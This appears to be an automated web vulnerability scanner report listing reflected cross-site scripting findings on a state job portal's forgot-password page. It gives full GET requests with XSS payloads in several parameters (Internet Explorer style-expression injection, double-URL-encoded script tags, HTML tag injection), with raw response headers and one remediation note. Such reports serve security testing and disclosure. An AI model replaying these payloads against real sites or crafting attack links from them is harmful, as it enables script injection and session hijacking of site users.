HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:22 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the formid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7db83"><a>0b5858b10bb was submitted in the formid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&formid=107db83"><a>0b5858b10bb&rand=662813&choice=1 HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:19:22 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <a href="/ada/mn_forgotpass.cfm?securitysys=on&formid=107db83"><a>0b5858b10bb&rand=805514&choice=2"> ...[SNIP]...
The value of the formid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f22"style%3d"x%3aexpression(alert(1))"386752025378121a2 was submitted in the formid parameter. This input was echoed as 98f22"style="x:expression(alert(1))"386752025378121a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=1098f22"style%3d"x%3aexpression(alert(1))"386752025378121a2&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the formname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 799ac"style%3d"x%3aexpression(alert(1))"4abc07c70f3b31178 was submitted in the formname parameter. This input was echoed as 799ac"style="x:expression(alert(1))"4abc07c70f3b31178 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0799ac"style%3d"x%3aexpression(alert(1))"4abc07c70f3b31178&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:24 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the library_errormessage request parameter is copied into the HTML document as plain text between tags. The payload fa763%253cscript%253ealert%25281%2529%253c%252fscript%253e0885d9cb6b2590cc1 was submitted in the library_errormessage parameter. This input was echoed as fa763<script>alert(1)</script>0885d9cb6b2590cc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the library_errormessage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520fa763%253cscript%253ealert%25281%2529%253c%252fscript%253e0885d9cb6b2590cc1&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... </li> fa763<script>alert(1)</script>0885d9cb6b2590cc1 </ul> ...[SNIP]...
The value of the library_errormessage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ccda"style%3d"x%3aexpression(alert(1))"396e9a22eeb45e270 was submitted in the library_errormessage parameter. This input was echoed as 8ccda"style="x:expression(alert(1))"396e9a22eeb45e270 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%25208ccda"style%3d"x%3aexpression(alert(1))"396e9a22eeb45e270&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the old_choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b86e"style%3d"x%3aexpression(alert(1))"aca403b3b was submitted in the old_choice parameter. This input was echoed as 8b86e"style="x:expression(alert(1))"aca403b3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:29'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the old_choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67674"style%3d"x%3aexpression(alert(1))"47dcb2bfae6b18167 was submitted in the old_choice parameter. This input was echoed as 67674"style="x:expression(alert(1))"47dcb2bfae6b18167 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=267674"style%3d"x%3aexpression(alert(1))"47dcb2bfae6b18167&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93e5"><a>3041bdbfc36 was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:00 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on 